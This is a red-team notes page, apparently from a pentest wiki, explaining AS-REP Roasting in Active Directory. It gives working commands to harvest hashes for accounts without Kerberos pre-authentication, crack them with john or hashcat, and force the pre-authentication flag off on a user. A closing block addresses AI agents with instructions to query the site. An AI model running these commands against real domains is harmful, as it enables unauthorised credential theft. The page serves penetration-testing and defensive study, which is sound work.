# AS-REP Roasting When requesting a TGT, the user must, by default, authenticate himself to the KDC (Key Distribution Center) for it to respond. This is known as Kerberos pre-authentication, meaning that a user will send an encrypted timestamp with his Kerberos key to the KDC in the AS-REQ message (to request a TGT). When we talk about the notion of TGT, it's often a misnomer, as we're actually talking about the **KRB\_AS\_REP**, which contains the TGT (encrypted with the KDC's secret) and the session key (encrypted with the user account's secret). ![](/files/kzqJ4yQN2CXesw51amER) As part of the KDC response is encrypted with the client account secret (the session key), it is important that this information is not accessible without authentication. If this were the case, anyone could request a TGT for a given account, and attempt to decrypt the encrypted part of the **KRB\_AS\_REP** response to retrieve the targeted user's password. However, on rare occasions, Kerberos pre-authentication may be disabled for an account (the **DONT\_REQUIRE\_PREAUTH** attribute is checked). As a result, pre-authentication is no longer required for these accounts, allowing an attacker to abuse this configuration. ![](/files/5I1rfA3sbJUYCycrObRy) Thus, anyone can impersonate these accounts by sending an AS-REQ message, and an AS-REP response will be returned by the KDC with data encrypted with the user's hash. Once in possession of the KRB\_AS\_REP KDC response, the attacker can attempt to break the hash of this offline password and thus obtain the targeted victim's password in cleartext. The AS\_REP Roasting attack consists in identifying users without the required Kerberos pre-authentication and sending an AS-REQ request on their behalf, in order to retrieve the data element encrypted with the user hash in the AS-REP message. Once the data has been retrieved, an offline cracking attack is carried out in an attempt to recover the user's password. **It is important to note that pre-authentication is enabled by default and must be disabled manually.** {% tabs %} {% tab title="Linux" %} #### [Impacket : ](https://github.com/SecureAuthCorp/impacket/) ```bash python GetNPUsers.py /: -request -format hashcat -outputfile hashes_asreproast.txt ``` #### [CrackMapExec : ](https://github.com/Porchetta-Industries/CrackMapExec) ```bash cme ldap -u -p '' --asreproast hashes_asreproast.txt ``` {% endtab %} {% tab title="Windows" %} #### [PowerView : ](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) ```powershell Get-DomainUser -PreauthNotRequired -verbose ``` #### [Rubeus : ](https://github.com/GhostPack/Rubeus) ```powershell .\Rubeus.exe asreproast /format:hashcat /outfile:hashes_asreproast.txt ``` {% endtab %} {% endtabs %} ### Cracking : ```bash john --wordlist=passwords_kerb.txt hashes_asreproast.txt hashcat -m 18200 --force -a 0 hashes_asreproast.txt passwords_kerb.txt ``` ### **RedTeam POV:** With sufficient rights (GenericAll/GenericWrite) an attacker can force the "pre-authentication not required" on a user : ```powershell Set-DomainObject -Identity -XOR @{useraccountcontrol=4194304} -Verbose ``` ## References : {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://blog.hacktive.bebzounette.com/active-directory/lateral-movement/kerberos/as-rep-roasting.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.